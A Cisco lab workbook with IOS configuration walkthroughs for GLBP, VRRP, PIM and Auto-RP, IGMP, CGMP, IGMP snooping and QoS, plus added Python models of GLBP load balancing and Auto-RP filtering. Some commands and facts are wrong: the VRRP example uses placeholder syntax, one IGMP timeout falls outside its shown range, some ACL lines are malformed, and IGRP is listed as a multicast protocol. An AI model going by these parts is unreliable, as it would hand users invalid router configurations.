Enable GLBP.
Outline
(config)# interface fa0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# glbp 10 authentication text testing
(config-if)# glbp 10 forwarder preempt delay minimum 60
(config-if)# glbp 10 load-balancing host-dependent
(config-if)# glbp 10 preempt delay minimum 60
(config-if)# glbp 10 priority 254
(config-if)# glbp 10 timers 5 18
(config-if)# glbp 10 ip 192.168.0.2

Example
(config)# interface fa0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# glbp ?
  <0-1023>  Group number
(config-if)# glbp 10 ?
  authentication  Authentication method
  forwarder       Forwarder configuration
  ip              Enable group and set virtual IP address
  load-balancing  Load balancing method
  name            Redundancy name
  preempt         Overthrow lower priority designated routers
  priority        Priority level
  timers          Adjust GLBP timers
  weighting       Gateway weighting and tracking
(config-if)# glbp 10 authentication ?
  md5   MD5 authentication
  text  Plain text authentication
(config-if)# glbp 10 authentication text ?
  WORD  Text authentication string
(config-if)# glbp 10 authentication text testing
(config-if)# gl 10 forwarder ?
  preempt  Overthrow lower priority active forwarders
(config-if)# gl 10 forwarder preempt ?
  delay  Wait before preempting
  <cr>
(config-if)# gl 10 forwarder preempt delay ?
  minimum  Delay at least this long
(config-if)# glbp 10 forwarder preempt delay minimum ?
  <0-3600>  Number of seconds for minimum delay
(config-if)# glbp 10 forwarder preempt delay minimum 60
(config-if)# glbp 10 load-balancing ?
  host-dependent  Load balance equally, source MAC determines forwarder choice
  round-robin     Load balance equally using each forwarder in turn
  weighted        Load balance in proportion to forwarder weighting
(config-if)# glbp 10 load-balancing host-dependent
(config-if)# glbp 10 pre ?
  delay  Wait before preempting
  <cr>
(config-if)# glbp 10 preempt delay minimum 60
(config-if)# glbp 10 pri ?
  <1-255>  Priority value
(config-if)# glbp 10 priority 254
(config-if)# glbp 10 timers ?
  <1-60>    Hello interval in seconds
  msec      Specify hello interval in milliseconds
  redirect  Specify time-out values for failed forwarders
(config-if)# glbp 10 timers 5 18
(config-if)# glbp 10 ip ?
  A.B.C.D  Virtual IP address
(config-if)# glbp 10 ip 192.168.0.2
glbp 10 authentication text testing
    This command authenticates GLBP packets received from the group of routers.
glbp 10 forwarder preempt delay minimum 60
    This command allows the router to take over as AVF (Active Virtual Forwarder) within a
    GLBP group, if it has a higher priority than the current AVF.
glbp 10 load-balancing host-dependent
    This command specifies the load balancing method: host-dependent, round-robin or
    weighted.
glbp 10 preempt delay minimum 60
    This command allows the router to take over as AVG (Active Virtual Gateway) within a
    GLBP group, if it has a higher priority than the current AVG.
glbp 10 priority 254
    This command sets the priority level of the gateway within a GLBP group.
glbp 10 timers 5 18
    This command configures the interval between hello packets sent by the AVG within the
    GLBP group. The second parameter is the holdtime, which specifies the time before the
    virtual gateway and virtual forwarder information is considered invalid.
glbp 10 ip 192.168.0.2
    Enable GLBP and define a virtual interface address.
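The three load-balancing methods listed in the glbp 10 load-balancing ? output, as an added Python example (not NetworkSims' or Cisco's code). It models the Active Virtual Gateway answering ARP requests for the virtual IP: each reply carries the virtual MAC of one Active Virtual Forwarder, so the chosen method decides which forwarder each host ends up using. It goes beyond the challenge, which configures only host-dependent, by showing all three methods side by side. Forwarder names, weightings and host MACs are constructed; the hash used for host-dependent is an assumption (Cisco does not publish its mapping), chosen only so that a given host always gets the same forwarder.

```python
"""GLBP AVG forwarder assignment model (added example, not NetworkSims' code)."""
import hashlib
from fractions import Fraction
from typing import Dict, List


class GlbpAvg:
    def __init__(self, method: str, forwarders: Dict[str, int]):
        """forwarders maps AVF name -> weighting (the 'glbp weighting' value)."""
        if method not in ("round-robin", "host-dependent", "weighted"):
            raise ValueError("unknown load-balancing method: " + method)
        self.method = method
        self.weights = dict(forwarders)
        self.alive = {name: True for name in forwarders}
        self.assigned = {name: 0 for name in forwarders}
        self._rr_index = 0

    def _live(self) -> List[str]:
        return [n for n in self.weights if self.alive[n]]

    def arp_reply(self, host_mac: str) -> str:
        """Return the AVF whose virtual MAC the AVG would put in the ARP reply."""
        live = self._live()
        if not live:
            raise RuntimeError("no active virtual forwarder available")
        if self.method == "round-robin":
            # each forwarder in turn
            choice = live[self._rr_index % len(live)]
            self._rr_index += 1
        elif self.method == "host-dependent":
            # source MAC determines the forwarder (hash is an assumption)
            digest = hashlib.sha256(host_mac.lower().encode()).digest()
            choice = live[int.from_bytes(digest[:4], "big") % len(live)]
        else:
            # weighted: hand out the forwarder whose assigned/weight ratio is lowest
            choice = min(live, key=lambda n: Fraction(self.assigned[n], self.weights[n]))
        self.assigned[choice] += 1
        return choice

    def forwarder_down(self, name: str) -> None:
        """AVF failure: the AVG stops handing this forwarder out to new hosts."""
        self.alive[name] = False


def distribution(method: str, requests: List[str], weights: Dict[str, int]) -> Dict[str, int]:
    """Count how many ARP replies each forwarder receives for a list of host MACs."""
    avg = GlbpAvg(method, weights)
    counts = {n: 0 for n in weights}
    for mac in requests:
        counts[avg.arp_reply(mac)] += 1
    return counts


# constructed host population: 150 distinct MAC addresses
SAMPLE_HOSTS = ["00:11:22:33:44:%02x" % i for i in range(150)]


if __name__ == "__main__":
    for m in ("round-robin", "host-dependent", "weighted"):
        print(m, distribution(m, SAMPLE_HOSTS, {"AVF1": 100, "AVF2": 50}))
```

With weightings 100 and 50 the weighted method gives exactly a 2:1 split over 150 requests, round-robin gives a 1:1 split, and host-dependent gives a roughly even split that is stable per host, which is the property that matters when stateful devices sit behind the forwarders.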

Cisco Router Challenge 210


Outline
Virtual Router Redundancy Protocol (VRRP) works in the same way as Hot Standby Router
Protocol (HSRP) and Gateway Load Balancing Protocol (GLBP): it provides an alternative
route for network traffic from a failed router or circuit. This challenge involves the
configuration of VRRP.
Objectives
The objectives of this challenge are to:

Define VRRP details.


Enable VRRP.

Outline
(config)# interface fa0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# vrrp 10 description text
(config-if)# vrrp 10 priority level
(config-if)# vrrp 10 preempt delay minimum 10
(config-if)# vrrp group timers learn
(config-if)# vrrp IP 192.168.0.2

Example
(config)# interface fa0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# vrrp 10 description text
(config-if)# vrrp 10 priority level
(config-if)# vrrp 10 preempt delay minimum 10
(config-if)# vrrp group timers learn
(config-if)# vrrp IP 192.168.0.2

Cisco Switch Test 6


Unit 6: Availability and Redundancy
The most up-to-date version of this test is at:
http://networksims.com/sw06.html


CCNP BCMSN Part 2

Cisco Switch Challenge 84


Outline
This challenge involves setting up multicast routing.
Objectives
The objectives of this challenge are to:

Enable multicasting routing.


Define that the interface port should be defined as a Layer 3 port (using no
switchport).
Define PIM parameters on an interface port.

Example
> enable
Switch# config t
Switch(config)# ip multicast
Switch(config)# int fa0/1
Switch(config-if)# no switchport
Switch(config-if)# ip pim ?
  bsr-border         Border of PIM domain
  dense-mode         Enable PIM dense-mode operation
  nbma-mode          Use Non-Broadcast Multi-Access (NBMA) mode on interface
  neighbor-filter    PIM peering filter
  query-interval     PIM router query interval
  sparse-dense-mode  Enable PIM sparse-dense-mode operation
  sparse-mode        Enable PIM sparse-mode operation
  version            PIM version
  <cr>
Switch(config-if)# ip pim version ?
<1-2> version number
Switch(config-if)# ip pim version 2
Switch(config-if)# ip pim dense-mode ?
proxy-register Send proxy registers
<cr>
Switch(config-if)# ip pim dense-mode
Switch(config-if)# ip pim bsr-border


Note: You will not see the ip pim command on an interface unless it is defined as a Layer 3
port.

Cisco Switch Challenge 85


Outline
This challenge involves manually defining a rendezvous point (RP) for a multicast group.
Objectives
The objectives of this challenge are to:

Enable multicasting routing.


Define an RP.

Example
> enable
Switch# config t
Switch(config)# ip multicast
Switch(config)# access-list 1 permit 224.1.1.1 0.0.0.0
Switch(config)# ip pim ?
  accept-register      Registers accept filter
  accept-rp            RP accept filter
  autorp               Configure AutoRP global operations
  bsr-candidate        Candidate bootstrap router (candidate BSR)
  register-rate-limit  Rate limit for PIM data registers
  rp-address           PIM RP-address (Rendezvous Point)
  rp-announce-filter   Auto-RP announce message filter
  rp-candidate         To be a PIMv2 RP candidate
  send-rp-announce     Auto-RP send RP announcement
  send-rp-discovery    Auto-RP send RP discovery message (as RP-mapping agent)
  spt-threshold        Source-tree switching threshold
  ssm                  Configure Source Specific Multicast
Switch(config)# ip pim rp-address ?
  A.B.C.D  IP address of Rendezvous-point for group
Switch(config)# ip pim rp-address 1.2.3.4 ?
  <1-99>       Access-list reference for group
  <1300-1999>  Access-list reference for group (expanded range)
  WORD         IP Named Standard Access list
  override     Overrides Auto RP messages
  <cr>
Switch(config)# ip pim rp-address 1.2.3.4 1

Cisco Switch Challenge 86


Outline
This challenge involves auto-RP for an existing sparse-mode cloud in multicast routing.
Objectives
The objectives of this challenge are to:

Enable multicasting routing.


Define an auto-RP.

Example
> enable
Switch# config t
Switch(config)# ip multicast
Switch(config)# access-list 5 permit 224.1.1.1 0.0.0.0
Switch(config)# ip pim ?
  accept-register      Registers accept filter
  accept-rp            RP accept filter
  autorp               Configure AutoRP global operations
  bsr-candidate        Candidate bootstrap router (candidate BSR)
  register-rate-limit  Rate limit for PIM data registers
  rp-address           PIM RP-address (Rendezvous Point)
  rp-announce-filter   Auto-RP announce message filter
  rp-candidate         To be a PIMv2 RP candidate
  send-rp-announce     Auto-RP send RP announcement
  send-rp-discovery    Auto-RP send RP discovery message (as RP-mapping agent)
  spt-threshold        Source-tree switching threshold
  ssm                  Configure Source Specific Multicast
Switch(config)# ip pi send-rp-announce ?
  Async              Async interface
  BVI                Bridge-Group Virtual Interface
  Dialer             Dialer interface
  FastEthernet       FastEthernet IEEE 802.3
  GigabitEthernet    GigabitEthernet IEEE 802.3z
  Lex                Lex interface
  Loopback           Loopback interface
  Multilink          Multilink-group interface
  Null               Null interface
  Port-channel       Ethernet Channel of interfaces
  Tunnel             Tunnel interface
  Virtual-Template   Virtual Template interface
  Virtual-TokenRing  Virtual TokenRing
  Vlan               Catalyst Vlans
Switch(config)# ip pim send-rp-announce fa0/1 ?
  scope  RP announcement scope
Switch(config)# ip pim send-rp-announce fa0/1 scope ?
  <1-255>  TTL of the RP announce packet
Switch(config)# ip pim send-rp-announce fa0/1 scope 30 ?
  group-list  Group access-list
  interval    RP announcement interval
  <cr>
Switch(config)# ip pim send-rp-announce fa0/1 scope 30 group-list ?
  <1-99>  Access-list reference for multicast groups
  WORD    IP Named Standard Access list
Switch(config)# ip pim send-rp-announce fa0/1 scope 30 group-list 5 ?
  interval  RP announcement interval
  <cr>
Switch(config)# ip pim send-rp-announce fa0/1 scope 30 group-list 5
Switch(config)# ip pim accept-rp ?
  A.B.C.D  IP address of RP for group
  auto-rp  only RP-mapping from Auto-RP
Switch(config)# ip pim accept-rp 1.2.3.4 ?
  <1-99>       Access-list reference for group
  <1300-1999>  Access-list reference for group (expanded range)
  WORD         IP Named Standard Access list
  <cr>
Switch(config)# ip pim accept-rp 1.2.3.4 5
Switch(config)# int fa0/1
Switch(config-if)# no switchport

Cisco Switch Challenge 87


Outline
This challenge involves preventing candidate RP spoofing.
Objectives
The objectives of this challenge are to:

Enable multicasting routing.


Define an auto-RP.

Example
> enable
Switch# config t
Switch(config)# ip multicast
Switch(config)# access-list 5 permit 224.1.1.1 0.0.0.0
Switch(config)# access-list 6 permit 19.10.11.12
Switch(config)# ip pim rp-announce-filter ?
  group-list  Group address access-list
  rp-list     RP address access-list
Switch(config)# ip pim rp-announce-filter rp-list ?
  <1-99>  Access-list reference for RP
  WORD    IP Named Standard Access list
Switch(config)# ip pim rp-announce-filter rp-list 6 ?
  group-list  Group address access-list
  <cr>
Switch(config)# ip pim rp-announce-filter rp-list 6 group-list ?
  <1-99>  Access-list reference for group
  WORD    IP Named Standard Access list
Switch(config)# ip pim rp-announce-filter rp-list 6 group-list 5
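What the rp-announce-filter command configured above does on an RP-mapping agent, as an added Python example (not NetworkSims' or Cisco's code). Each Auto-RP RP-Announce message names a candidate RP and the groups it offers to serve; the mapping agent keeps an announcement only when the RP address is permitted by the rp-list access list (6) and the group is permitted by the group-list access list (5), so an announcement from an address that is not on the list is simply dropped. The standard-ACL matcher implements IOS wildcard-mask semantics (ordered entries, first match wins, implicit deny). The filter model is simplified to one (RP, group) pair per announcement, and the announcement contents are constructed sample data.

```python
"""Auto-RP announce filtering model (added example, not NetworkSims' code)."""
from ipaddress import IPv4Address
from typing import Dict, List, Tuple


class StandardAcl:
    """Ordered (action, address, wildcard) entries; first match wins,
    and anything not matched is denied, as in IOS."""

    def __init__(self, number: int):
        self.number = number
        self.entries: List[Tuple[str, int, int]] = []

    def add(self, action: str, address: str, wildcard: str = "0.0.0.0") -> "StandardAcl":
        if action not in ("permit", "deny"):
            raise ValueError("action must be permit or deny: " + action)
        if address == "any":
            address, wildcard = "0.0.0.0", "255.255.255.255"
        self.entries.append((action, int(IPv4Address(address)), int(IPv4Address(wildcard))))
        return self

    def permits(self, address: str) -> bool:
        addr = int(IPv4Address(address))
        for action, entry, wild in self.entries:
            # wildcard bits set to 1 are "don't care"; compare only the remaining bits
            if (addr & ~wild) == (entry & ~wild):
                return action == "permit"
        return False                      # implicit deny at the end of every ACL


def rp_announce_filter(rp_list: StandardAcl, group_list: StandardAcl,
                       announcements: List[Tuple[str, str]]) -> Dict[str, List[Tuple[str, str]]]:
    """Partition (rp_address, group) announcements into accepted and dropped."""
    result: Dict[str, List[Tuple[str, str]]] = {"accepted": [], "dropped": []}
    for rp, group in announcements:
        ok = rp_list.permits(rp) and group_list.permits(group)
        result["accepted" if ok else "dropped"].append((rp, group))
    return result


def run_example() -> Dict[str, List[Tuple[str, str]]]:
    # The two access lists from the challenge:
    #   access-list 5 permit 224.1.1.1 0.0.0.0   (used as the group-list)
    #   access-list 6 permit 19.10.11.12         (used as the rp-list)
    acl5 = StandardAcl(5).add("permit", "224.1.1.1", "0.0.0.0")
    acl6 = StandardAcl(6).add("permit", "19.10.11.12")
    announcements = [                      # constructed RP-Announce contents
        ("19.10.11.12", "224.1.1.1"),      # the expected candidate RP
        ("19.10.11.99", "224.1.1.1"),      # address not on the rp-list
        ("19.10.11.12", "239.1.1.1"),      # expected RP, group not on the group-list
    ]
    return rp_announce_filter(acl6, acl5, announcements)


if __name__ == "__main__":
    for verdict, items in run_example().items():
        print(verdict, items)
```

Only the first announcement survives. The same matcher applies to the accept-rp command from the previous challenge, which does the equivalent check on the routers that consume the RP mappings rather than on the mapping agent.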

Cisco Switch Challenge 88


Area: Switches IP Multicast (PIM)
Outline
IP Multicast can use several different types of protocols, such as PIM, DVMRP, IGRP and
CGMP. This tutorial outlines the configuration of PIM.
Objectives
The objectives of this challenge are to:

Define PIM.

The commands used are:


# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip pim version 2
(config-if)# ip pim dense-mode
(config-if)# ip pim bsr-border
(config-if)# ip multicast boundary 11
(config-if)# exit
(config)# access-list 10 permit 220.1.1.1 0.0.0.0
(config)# access-list 11 deny 220.1.1.1 0.0.0.0
(config)# ip pim rp-address 192.168.1.1 10
(config)# ip pim send-rp-announce fa0/1 scope 30 group-list 5
(config)# ip pim accept-rp 1.2.3.4 10
(config)# ip pim send-rp-discovery scope 10
(config)# ip pim rp-announce-filter rp-list 2 group-list 1

Example
# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip pim ?
  bsr-border         Border of PIM domain
  dense-mode         Enable PIM dense-mode operation
  nbma-mode          Use Non-Broadcast Multi-Access (NBMA) mode on interface
  neighbor-filter    PIM peering filter
  query-interval     PIM router query interval
  sparse-dense-mode  Enable PIM sparse-dense-mode operation
  sparse-mode        Enable PIM sparse-mode operation
  version            PIM version
  <cr>
(config-if)# ip pim sparse-mode
(config-if)# ip pim version ?
<1-2> version number
(config-if)# ip pim version 2
(config-if)# ip pim bsr-border
(config-if)# ip multicast ?
  boundary       Boundary for administratively scoped multicast addresses
  helper-map     Broadcast to Multicast map OR Multicast to Broadcast map
  rate-limit     Rate limit multicast data packets
  ttl-threshold  TTL threshold for multicast packets
(config-if)# ip multicast boundary ?
  <1-99>       Access-list number
  <1300-1999>  <access-list> (expanded range)
  WORD         IP Named Standard Access list
(config-if)# ip multicast boundary 10
(config-if)# exit
(config)# access-list 10 permit 220.1.1.1 0.0.0.0
(config)# ip pim ?
  accept-register      Registers accept filter
  accept-rp            RP accept filter
  autorp               Configure AutoRP global operations
  bsr-candidate        Candidate bootstrap router (candidate BSR)
  register-rate-limit  Rate limit for PIM data registers
  rp-address           PIM RP-address (Rendezvous Point)
  rp-announce-filter   Auto-RP announce message filter
  rp-candidate         To be a PIMv2 RP candidate
  send-rp-announce     Auto-RP send RP announcement
  send-rp-discovery    Auto-RP send RP discovery message (as RP-mapping agent)
  spt-threshold        Source-tree switching threshold
  ssm                  Configure Source Specific Multicast

(config)# ip pim rp-address ?
  A.B.C.D  IP address of Rendezvous-point for group
(config)# ip pim rp-address 192.168.1.1 ?
  <1-99>       Access-list reference for group
  <1300-1999>  Access-list reference for group (expanded range)
  WORD         IP Named Standard Access list
  override     Overrides Auto RP messages
  <cr>
(config)# ip pim rp-address 192.168.1.1 10
(config)# ip pim send-rp-announce fa0/1 ?
  scope  RP announcement scope
(config)# ip pim send-rp-announce fa0/1 scope ?
  <1-255>  TTL of the RP announce packet
(config)# ip pim send-rp-announce fa0/1 scope 30 ?
  group-list  Group access-list
  interval    RP announcement interval
  <cr>
(config)# ip pim send-rp-announce fa0/1 scope 30 group-list ?
  <1-99>  Access-list reference for multicast groups
  WORD    IP Named Standard Access list
(config)# ip pim send-rp-announce fa0/1 scope 30 group-list 5 ?
  interval  RP announcement interval
  <cr>
(config)# ip pim send-rp-announce fa0/1 scope 30 group-list 5
(config)# ip pim accept-rp ?
  A.B.C.D  IP address of RP for group
  auto-rp  only RP-mapping from Auto-RP
(config)# ip pim accept-rp 1.2.3.4 ?
  <1-99>       Access-list reference for group
  <1300-1999>  Access-list reference for group (expanded range)
  WORD         IP Named Standard Access list
  <cr>
(config)# ip pim accept-rp 1.2.3.4 10
(config)# ip pim send-rp-discovery ?
  Async              Async interface
  BVI                Bridge-Group Virtual Interface
  Dialer             Dialer interface
  FastEthernet       FastEthernet IEEE 802.3
  GigabitEthernet    GigabitEthernet IEEE 802.3z
  Lex                Lex interface
  Loopback           Loopback interface
  Multilink          Multilink-group interface
  Null               Null interface
  Port-channel       Ethernet Channel of interfaces
  Tunnel             Tunnel interface
  Virtual-Template   Virtual Template interface
  Virtual-TokenRing  Virtual TokenRing
  Vlan               Catalyst Vlans
  scope              Scope of the RP discovery packets
(config)# ip pi send-rp-d s ?
  <1-255>  TTL
(config)# ip pi send-rp-d scope 10
(config)# ip pim rp-ann ?
  group-list  Group address access-list
  rp-list     RP address access-list
(config)# ip pim rp-ann rp- ?
  <1-99>  Access-list reference for RP
  WORD    IP Named Standard Access list
(config)# ip pim rp-ann rp- 10 ?
  group-list  Group address access-list
  <cr>
(config)# ip pim rp-ann rp- 10 gr ?
  <1-99>  Access-list reference for group
  WORD    IP Named Standard Access list

(config)# ip pim rp-announce-filter rp-list 10 group-list 1

Cisco Switch Challenge 89


Area: Switches IGMP
Outline
This challenge defines some IGMP parameters on interfaces.
Objectives
The objectives of this challenge are to:

Define IGMP.

The commands used are:


# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip igmp join-group 224.0.0.1
(config-if)# ip igmp querier-timeout 10
(config-if)# ip igmp query-interval 10
(config-if)# ip igmp query-max-response-time 10
(config-if)# ip igmp version 2

Notes
# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip igmp ?
  access-group                IGMP group access group
  helper-address              IGMP helper address
  immediate-leave             Leave groups immediately without sending last
                              member query, use for one host network only
  join-group                  IGMP join multicast group
  last-member-query-interval  IGMP last member query interval
  querier-timeout             IGMP previous querier timeout
  query-interval              IGMP host query interval
  query-max-response-time     IGMP max query response value
  static-group                IGMP static multicast group
  tcn                         IGMP TCN configuration
  unidirectional-link         IGMP unidirectional link multicast routing
  v3lite                      Enable/Disable IGMPv3 Lite
  version                     IGMP version
(config-if)# ip igmp jo ?
  A.B.C.D  IP group address
(config-if)# ip igmp jo 224.0.0.1
(config-if)# ip igmp querier- ?
  <60-300>  timeout value in seconds
(config-if)# ip igmp querier- 10
(config-if)# ip igmp query-m ?
  <1-25>  query response value in seconds
(config-if)# ip igmp query-m 10
(config-if)# ip igmp ve ?
  <1-3>  version number
(config-if)# ip igmp ve 2

Cisco Switch Challenge 90


Area: Switches IGMP: Controlling access to IP Multicast Groups
Outline
This challenge defines a multicast ACL and restricts IP Multicast.
Objectives
The objectives of this challenge are to:

Define IGMP restriction.

The commands used are:


# config t
(config)# access-list 101 deny host 225.5.5.5 0.0.0.0
(config)# access-list 101 permit any any
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip igmp access-group 101
(config-if)# ip igmp join-group 224.0.0.1
(config-if)# ip igmp querier-timeout 10
(config-if)# ip igmp query-interval 10
(config-if)# ip igmp query-max-response-time 10
(config-if)# ip igmp version 2

Notes
# config t
(config)# access-list 101 deny host 225.5.5.5 0.0.0.0
(config)# access-list 101 permit any any
(config)# int fa0/1
(config-if)# no switchport

(config-if)# ip igmp ?
  access-group                IGMP group access group
  helper-address              IGMP helper address
  immediate-leave             Leave groups immediately without sending last
                              member query, use for one host network only
  join-group                  IGMP join multicast group
  last-member-query-interval  IGMP last member query interval
  querier-timeout             IGMP previous querier timeout
  query-interval              IGMP host query interval
  query-max-response-time     IGMP max query response value
  static-group                IGMP static multicast group
  tcn                         IGMP TCN configuration
  unidirectional-link         IGMP unidirectional link multicast routing
  v3lite                      Enable/Disable IGMPv3 Lite
  version                     IGMP version
(config-if)# ip igmp access-group 101
(config-if)# ip igmp join-group 224.0.0.1
(config-if)# ip igmp querier-timeout 10
(config-if)# ip igmp query-interval 10
(config-if)# ip igmp query-max-response-time 10
(config-if)# ip igmp version 2

Cisco Switch Challenge 91


Area: Switches CGMP
Outline
This challenge involves setting up a CGMP server on the switch.
Objectives
The objectives of this challenge are to:

Define CGMP servers.

The commands used are:


# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip cgmp
(config)# int fa0/2
(config-if)# no switchport
(config-if)# ip cgmp proxy
(config)# int fa0/3
(config-if)# no switchport
(config-if)# ip cgmp router-only

Notes
# config t

(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip ?
Interface IP configuration subcommands:
  access-group        Specify access control for packets
  accounting          Enable IP accounting on this interface
  address             Set the IP address of an interface
  authentication      authentication subcommands
  bandwidth-percent   Set EIGRP bandwidth limit
  bgp                 BGP interface commands
  broadcast-address   Set the broadcast address of an interface
  cef                 Cisco Express Fowarding interface commands
  cgmp                Enable/disable CGMP
  dhcp                Configure DHCP parameters for this interface
  directed-broadcast  Enable forwarding of directed broadcasts
  dvmrp               DVMRP interface commands
  hello-interval      Configures IP-EIGRP hello interval
  helper-address      Specify a destination address for UDP broadcasts
  hold-time           Configures IP-EIGRP hold time
  igmp                IGMP interface commands
  irdp                ICMP Router Discovery Protocol
  load-sharing        Style of load sharing
  local-proxy-arp     Enable local-proxy ARP
  mask-reply          Enable sending ICMP Mask Reply messages
  mrm                 Configure IP Multicast Routing Monitor tester
  mroute-cache        Enable switching cache for incoming multicast packets
  mtu                 Set IP Maximum Transmission Unit
  multicast           IP multicast interface commands
  ospf                OSPF interface commands
  pim                 PIM interface commands
  policy              Enable policy routing
  probe               Enable HP Probe support
  proxy-arp           Enable proxy ARP
  rarp-server         Enable RARP server for static arp entries
  redirects           Enable sending ICMP Redirect messages
  rgmp                Enable/disable RGMP
  rip                 Router Information Protocol
  route-cache         Enable fast-switching cache for outgoing packets
  sap                 Session Advertisement Protocol interface commands
  sdr                 Session Directory Protocol interface commands
  security            DDN IP Security Option
  split-horizon       Perform split horizon
  summary-address     Perform address summarization
  unnumbered          Enable IP processing without an explicit address
  unreachables        Enable sending ICMP Unreachable messages
  urd                 Configure URL Rendezvousing
  vrf                 VPN Routing/Forwarding parameters on the interface
  wccp                WCCP interface commands
(config-if)# ip cgmp ?
  proxy        CGMP for hosts and proxy for multicast routers
  router-only  CGMP proxy for multicast routers only
  <cr>
(config-if)# ip cgmp
(config)# int fa0/2
(config-if)# no switchport
(config-if)# ip cgmp proxy
(config)# int fa0/3
(config-if)# no switchport
(config-if)# ip cgmp router-only

Cisco Switch Challenge 92


Outline
This challenge involves using IGMP snooping.
Objectives
The objectives of this challenge are to:

Define VLANs.
Enable IGMP snooping.

Example
> en
(vlan)# vlan database
(vlan)# ?
VLAN database editing buffer manipulation commands:
  abort  Exit mode without applying the changes
  apply  Apply current changes and bump revision number
  exit   Apply changes, bump revision number, and exit mode
  no     Negate a command or set its defaults
  reset  Abandon current changes and reread current database
  show   Show database information
  vlan   Add, delete, or modify values associated with a single VLAN
  vtp    Perform VTP administrative functions.
(vlan)# vlan ?
  <1-1005>  ISL VLAN index
(vlan)# vlan 1 ?
  are        Maximum number of All Route Explorer hops for this VLAN
  backupcrf  Backup CRF mode of the VLAN
  bridge     Bridging characteristics of the VLAN
  media      Media type of the VLAN
  mtu        VLAN Maximum Transmission Unit
  name       Ascii name of the VLAN
  parent     ID number of the Parent VLAN of FDDI or Token Ring type VLANs
  ring       Ring number of FDDI or Token Ring type VLANs
  said       IEEE 802.10 SAID
  state      Operational state of the VLAN
  ste        Maximum number of Spanning Tree Explorer hops for this VLAN
  stp        Spanning tree characteristics of the VLAN
  tb-vlan1   ID number of the first translational VLAN for this VLAN (or zero if none)
  tb-vlan2   ID number of the second translational VLAN for this VLAN (or zero if none)
  <cr>
(vlan)# vlan 1 name ?
  WORD  The ascii name for the VLAN
(vlan)# vlan 1 name edinburgh
(vlan)# vlan 2 name glasgow

(vlan)# exit
# config t
(config)# ip igmp snooping ?
(config)# ip igmp snooping vlan 1 immediate-leave
(config)# ip igmp snooping vlan 2 immediate-leave
(config)# exit
# show ip igmp snoop
Global IGMP Snooping configuration:
-----------------------------------
IGMP snooping              : Enabled
IGMPv3 snooping (minimal)  : Enabled
Report suppression         : Enabled
TCN solicit query          : Disabled
TCN flood query count      : 2

Vlan 1:
--------
IGMP snooping                  : Enabled
Immediate leave                : Enabled
Multicast router learning mode : pim-dvmrp
Source only learning age timer : 10
CGMP interoperability mode     : IGMP_ONLY

Note the vlan database command will be phased out. An improved method is:
Switch(config)# vlan 1
Switch(config-vlan)# ?
VLAN configuration commands:
  are           Maximum number of All Route Explorer hops for this VLAN (or zero if none specified)
  backupcrf     Backup CRF mode of the VLAN
  bridge        Bridging characteristics of the VLAN
  exit          Apply changes, bump revision number, and exit mode
  media         Media type of the VLAN
  mtu           VLAN Maximum Transmission Unit
  name          Ascii name of the VLAN
  no            Negate a command or set its defaults
  parent        ID number of the Parent VLAN of FDDI or Token Ring type VLANs
  private-vlan  Configure a private VLAN
  remote-span   Configure as Remote SPAN VLAN
  ring          Ring number of FDDI or Token Ring type VLANs
  said          IEEE 802.10 SAID
  shutdown      Shutdown VLAN switching
  state         Operational state of the VLAN
  ste           Maximum number of Spanning Tree Explorer hops for this VLAN (or zero if none specified)
  stp           Spanning tree characteristics of the VLAN
  tb-vlan1      ID number of the first translational VLAN for this VLAN (or zero if none)
  tb-vlan2      ID number of the second translational VLAN for this VLAN (or zero if none)

Switch(config-vlan)# name ?
  WORD  The ascii name for the VLAN

----------------

Switch# sh env ?
  all          Show all environment status
  fan          Show fan status
  power        Show power supply status
  rps          Show RPS status
  temperature  Show temperature status

Switch# sh env all


FAN is OK
TEMPERATURE is OK
POWER is OK
RPS is NOT PRESENT
Switch# sh env fan
FAN is OK
Switch# sh env p
POWER is OK
Switch# sh env r
RPS is NOT PRESENT
Switch# sh env t
TEMPERATURE is OK

Cisco Switch Test 7 (Challenge 93)


Unit 7: Multicast
The most up-to-date version of this test is at:
http://networksims.com/sw07.html

Cisco Switch Challenge 94


Outline
This challenge involves the configuration of QoS.
Objectives
The objectives of this challenge are to:

Define interesting traffic with an ACL.


Define QoS parameters.

Example

NetworkSims.com

275

> en
# config t
(config)# access-list 108 permit ip 162.78.102.0 0.0.255.255 247.226.90.0
0.0.255.255
(config)# class-map tayside
(config-cmap)# ?
QoS class-map configuration commands:
description  Class-Map description
exit         Exit from QoS class-map configuration mode
match        classification criteria
no           Negate or set default values of a command
rename       Rename this class-map
(config-cmap)# match ?
access-group         Access group
any                  Any packets
class-map            Class map
destination-address  Destination address
input-interface      Select an input interface to match
ip                   IP specific values
mpls                 Multi Protocol Label Switching specific values
not                  Negate this match result
protocol             Protocol
source-address       Source address
vlan                 VLANs to match
(config-cmap)# match ac ?
<1-2699>  Access list index
name      Named Access List
(config-cmap)# match access-group 108
(config-cmap)# exit
(config)# policy-map ankle
(config-pmap)# ?
QoS policy-map configuration commands:
class        policy criteria
description  Policy-Map description
exit         Exit from QoS policy-map configuration mode
no           Negate or set default values of a command
rename       Rename this policy-map
(config-pmap)# class tayside
(config-pmap-c)# ?
QoS policy-map class configuration commands:
bandwidth  Bandwidth
exit       Exit from QoS class action configuration mode
no         Negate or set default values of a command
trust      Set trust value for the class
<cr>
police     Police
set        Set QoS values
(config-pmap-c)# bandwidth 128
(config-pmap-c)# queue-limit 21
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int fa0/1
(config-if)# service-policy ?
history  Keep history of QoS metrics
input    Assign policy-map to the input of an interface
output   Assign policy-map to the output of an interface
Switch(config-if)# se o ?
WORD policy-map name
(config-if)# service-policy output ankle

Explanation
The following shows an example of limiting all the traffic which fits access-list 111 to
2Mbps:

[Figure: Class map (identify traffic characteristic) -> Policy map (define the policy for the traffic) -> Service policy (apply the policy to an interface)]

# class-map cmap
(config-cmap)# match access-group 111
# policy-map pmap
(config-pmap)# class cmap
(config-pmap-c)# bandwidth 2000
# int s0
(config-if)# service-policy output pmap

